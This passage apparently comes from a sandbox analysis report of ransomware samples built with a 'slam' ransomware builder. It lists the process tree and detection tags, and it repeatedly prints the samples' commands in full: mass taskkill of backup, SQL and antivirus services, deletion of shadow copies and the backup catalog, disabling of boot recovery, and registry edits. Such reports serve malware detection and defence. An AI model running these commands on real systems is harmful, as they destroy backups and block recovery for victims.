/F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentBrowser*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecDiveciMediaService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecJobEngine*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecManagementService*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svc$*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM memtas*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM backup*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxVss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxBlr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxFWD*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCVD*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCIMgr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DefWatch*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ccEvtMgr*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SavRoam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM RTVscan*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBFCService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Intuit.QuickBooks.FCS*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooBackup*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooIT*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zhudongfangyu*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM stc_raw_agent*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VSNAPVSS*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBCFMonitorService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamTransportSvc*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamDeploymentService*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamNFSSvc*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM PDVFSService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecVSSProvider*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentAccelerator*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecRPCService*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcrSch2Svc*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcronisAgent*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CASAD2DWebSvc*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CAARCUpdateSvc*3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM TeamViewer*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd %appdata% & 1.bat2⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\slam_ransomware_builder\test1.exe"C:\slam_ransomware_builder\test1.exe"1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Drops desktop.ini file(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state on & netsh advfirewall set currentprofile state on & netsh advfirewall set domainprofile state on & netsh advfirewall set privateprofile state on & netsh advfirewall set publicprofile state on & REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f & REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f & REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f & powershell -Command Remove-MpPreference -ExclusionExtension .exe2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f3⤵
-
-
C:\Windows\system32\reg.exeREG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f3⤵
-
-
C:\Windows\system32\reg.exeREG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f3⤵
- Modifies registry key
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-MpPreference -ExclusionExtension .exe3⤵
-
-
-
C:\slam_ransomware_builder\test.exe"C:\slam_ransomware_builder\test.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentBrowser*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecDiveciMediaService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecJobEngine*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecManagementService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vss*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sql*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svc$*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM memtas*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM backup*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxVss*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxBlr*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxFWD*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCVD*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCIMgr*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DefWatch*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ccEvtMgr*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SavRoam*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM RTVscan*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBFCService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooBackup*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooIT*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zhudongfangyu*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM stc_raw_agent*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VSNAPVSS*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBCFMonitorService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamTransportSvc*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamDeploymentService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamNFSSvc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM PDVFSService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecVSSProvider*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentAccelerator*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecRPCService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcrSch2Svc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcronisAgent*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CASAD2DWebSvc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CAARCUpdateSvc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM TeamViewer*3⤵
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd %appdata% & 1.bat2⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\slam_ransomware_builder\test1.exe"C:\slam_ransomware_builder\test1.exe"1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Drops desktop.ini file(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state on & netsh advfirewall set currentprofile state on & netsh advfirewall set domainprofile state on & netsh advfirewall set privateprofile state on & netsh advfirewall set publicprofile state on & REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f & REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f & REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f & powershell -Command Remove-MpPreference -ExclusionExtension .exe2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f3⤵
-
-
C:\Windows\system32\reg.exeREG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f3⤵
-
-
C:\Windows\system32\reg.exeREG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f3⤵
- Modifies registry key
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-MpPreference -ExclusionExtension .exe3⤵
-
-
-
C:\slam_ransomware_builder\test.exe"C:\slam_ransomware_builder\test.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentBrowser*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecDiveciMediaService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecJobEngine*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecManagementService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vss*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sql*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svc$*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM memtas*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM backup*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxVss*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxBlr*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxFWD*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCVD*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCIMgr*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DefWatch*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ccEvtMgr*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SavRoam*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM RTVscan*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBFCService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Intuit.QuickBooks.FCS*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooBackup*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooIT*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zhudongfangyu*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM stc_raw_agent*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VSNAPVSS*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBCFMonitorService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamTransportSvc*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamDeploymentService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamNFSSvc*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM PDVFSService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecVSSProvider*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentAccelerator*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecRPCService*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcrSch2Svc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcronisAgent*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CASAD2DWebSvc*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CAARCUpdateSvc*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM TeamViewer*3⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\slam_ransomware_builder\test1.exe"C:\slam_ransomware_builder\test1.exe"1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Drops desktop.ini file(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state on & netsh advfirewall set currentprofile state on & netsh advfirewall set domainprofile state on & netsh advfirewall set privateprofile state on & netsh advfirewall set publicprofile state on & REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f & REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f & REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f & powershell -Command Remove-MpPreference -ExclusionExtension .exe2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state on3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f3⤵
-
-
C:\Windows\system32\reg.exeREG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f3⤵
-
-
C:\Windows\system32\reg.exeREG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f3⤵
- Modifies registry key
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-MpPreference -ExclusionExtension .exe3⤵
-
-
-
C:\slam_ransomware_builder\test.exe"C:\slam_ransomware_builder\test.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentBrowser*3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecDiveciMediaService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecJobEngine*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecManagementService*3⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vss*3⤵
- Kills process with taskkill
-
-
